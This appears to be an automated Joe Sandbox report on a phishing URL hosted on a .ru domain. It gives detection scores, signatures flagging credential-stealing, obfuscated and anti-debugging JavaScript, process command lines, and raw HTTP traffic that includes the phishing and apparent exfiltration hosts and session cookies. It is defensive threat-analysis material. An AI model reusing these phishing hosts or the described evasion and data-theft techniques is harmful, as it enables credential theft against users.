Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/

Overview

General Information

Sample URL:https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/
Analysis ID:1579178
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
AI detected suspicious Javascript
AI detected suspicious URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 3552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3184 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1624 --field-trial-handle=2032,i,17181791565216499236,9261844077795664136,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6548 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

barindex
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gadk.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjH... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft Power BI domain, which is likely not the intended functionality. These behaviors are highly suspicious and indicate a potentially malicious intent, warranting a high-risk score.
Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gadk.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjH... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to an external website. The combination of these behaviors suggests a high likelihood of malicious intent, potentially to prevent analysis or hide unwanted activities.
Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gadk.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjH... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and URLs further increases the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: EmailJoe Sandbox AI: AI detected Typosquatting in URL: https://gADK.quantumdhub.ru
Source: https://gadk.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/HTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No favicon
Source: https://www.microsoft.com/en-us/power-platform/products/power-bi/getting-started-with-power-biHTTP Parser: No favicon
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/ HTTP/1.1Host: gadk.quantumdhub.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gadk.quantumdhub.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gadk.quantumdhub.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gadk.quantumdhub.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gadk.quantumdhub.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1gq28/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://gadk.quantumdhub.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f53738f5cfa15bb&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1gq28/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1gq28/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gadk.quantumdhub.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gadk.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZpRlNVMjlYSm9ZcXFqbWpXVGtFWlE9PSIsInZhbHVlIjoieXoxNG9xYWtqcGRDUkZOMXFtT1hZZTFRZjNXM0RxU3Y2WUIxUHpCV0NKTThnQ09ML3hqcjRnRXd2QndiU1Y3K0xvQjlXVlFsZFcxckE4bnMvQnVMTHhOVXl3aWgzV1VicjgrQzhIWG9lNUEzTVRUajlJOXYyNHlhblhKM1drTUwiLCJtYWMiOiJjNDE2Mzk2NmI4MTJmZjNlMzY0MTkyYWIzZWExNTBlOTZiYTlmMDkzNjcxODkzNWEwNDM3MTE2ZWQyNWEzMWU0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFJS2xRSlN4VVZLdXRCc0pOYk5VZnc9PSIsInZhbHVlIjoiazlhQkxNV3F6OVdHWDZ6ZE9LOTVWcnZORmxTOVBqQ0kxeXkzdm5xZ0VmeXhCNlZDMU5rMC9zUmFsY1cwNXVMUlFzK3kyNTJQZGNGNFIvK3hEbXdCbnV0MTVFV0JsakZSTTN0d1JXbmtmTDBub1RPc3F6OW10b0w3c2tpcU5QcnciLCJtYWMiOiI2NjAxNzk2NGU1MmQzYjc1YjVjYTQ4MGVhMTczZWNhZGIxYjBjZDQwYWIyNzY5MjUyNzQ5M2MwZDNiNDE3NzY5IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f53738f5cfa15bb&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/646785597:1734736264:AViGtQzSaaabc8hrjDXP21IkLtA_JA6kCdlbd7_lW4U/8f53738f5cfa15bb/Z6QE2UCD8GP1ik6GkC.hfElbKlamBauzDmHzwaBFQLs-1734737753-1.1.1.1-9mi5jcAkowfj88LcB7QDKM3IIlqsh0_ISo9UR_Wu85cb0Ya_9q16gt77fpCmc6aN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f53738f5cfa15bb/1734737757657/266c2338cf1da0c0197c76b0ce5e22a9a128cea85378c77008f8b5687810be47/iRJ4oKYtIhGUez2 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1gq28/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f53738f5cfa15bb/1734737757661/UAGFpR2sTVmHXbx HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/1gq28/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f53738f5cfa15bb/1734737757661/UAGFpR2sTVmHXbx HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/646785597:1734736264:AViGtQzSaaabc8hrjDXP21IkLtA_JA6kCdlbd7_lW4U/8f53738f5cfa15bb/Z6QE2UCD8GP1ik6GkC.hfElbKlamBauzDmHzwaBFQLs-1734737753-1.1.1.1-9mi5jcAkowfj88LcB7QDKM3IIlqsh0_ISo9UR_Wu85cb0Ya_9q16gt77fpCmc6aN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/646785597:1734736264:AViGtQzSaaabc8hrjDXP21IkLtA_JA6kCdlbd7_lW4U/8f53738f5cfa15bb/Z6QE2UCD8GP1ik6GkC.hfElbKlamBauzDmHzwaBFQLs-1734737753-1.1.1.1-9mi5jcAkowfj88LcB7QDKM3IIlqsh0_ISo9UR_Wu85cb0Ya_9q16gt77fpCmc6aN HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ZATfZymFloKYOUYHhMIPbYQbYmLCVGEUSJTYXKLELYVOVSTVWWBDRAXVWRBSWFMJQXZNOKQCTXW HTTP/1.1Host: qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://gadk.quantumdhub.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gadk.quantumdhub.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ZATfZymFloKYOUYHhMIPbYQbYmLCVGEUSJTYXKLELYVOVSTVWWBDRAXVWRBSWFMJQXZNOKQCTXW HTTP/1.1Host: qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=4.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=EA76ADE95776D2EC7F000101%40AdobeOrg&d_nsid=0&ts=1734737818811 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: https://www.microsoft.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /microsoft/lp_ada_enhancements-prod.js HTTP/1.1Host: static-assets.fs.liveperson.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://publisher.liveperson.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=4.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=EA76ADE95776D2EC7F000101%40AdobeOrg&d_nsid=0&ts=1734737818811 HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=65697634601447774650234603073451317819
Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=4.4.0&d_fieldgroup=A&mcorgid=EA76ADE95776D2EC7F000101%40AdobeOrg&mid=65955960084563645340280706213568852788&ts=1734737820889 HTTP/1.1Host: msftenterprise.sc.omtrdc.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: https://www.microsoft.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /dest5.html?d_nsid=0 HTTP/1.1Host: mscom.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=65697634601447774650234603073451317819
Source: chromecache_268.2.dr, chromecache_278.2.drString found in binary or memory: </svg>`;function EW(a,s){return l=>{const p=AW(l).map(f=>CW(f));s.setValue({...s.value,shareOptions:p});function d(){s.setValue({...s.value,shareDialogOpened:!0})}function m(){var f,E,I,D,N,O;s.setValue({...s.value,shareDialogOpened:!1}),(O=(N=(D=(I=(E=(f=a.renderRoot)==null?void 0:f.querySelector("ump-controls"))==null?void 0:E.renderRoot.querySelector("ump-control-bar"))==null?void 0:I.renderRoot.querySelector("ump-more-menu"))==null?void 0:D.renderRoot.querySelector('[data-id="more-menu-button"]'))==null?void 0:N.focus)==null||O.call(N)}const y=Hh(a);return y.addEventListener("share-button-clicked",d),y.addEventListener("share-dialog-closed",m),()=>{y.removeAllListeners()}}}function AW(a){return a.options.share?a.options.shareOptions.length===0?wM:a.options.shareOptions:[]}function CW(a){const s=new URL(window.location.href);s.searchParams.delete("jsapi");const l=s.toString();switch(a){case"facebook":return{id:"facebook",url:`https://www.facebook.com/share.php?u=${encodeURIComponent(l)}`,icon:SW};case"linkedin":return{id:"linkedin",url:`https://www.linkedin.com/shareArticle?mini=true&url=${encodeURIComponent(l)}&title=&summary=&source=`,icon:TW};case"twitter":return{id:"twitter",url:`https://x.com/share?url=${encodeURIComponent(l)}&text=`,icon:kW};case"mail":return{id:"mail",url:`mailto:?subject=Check out this great 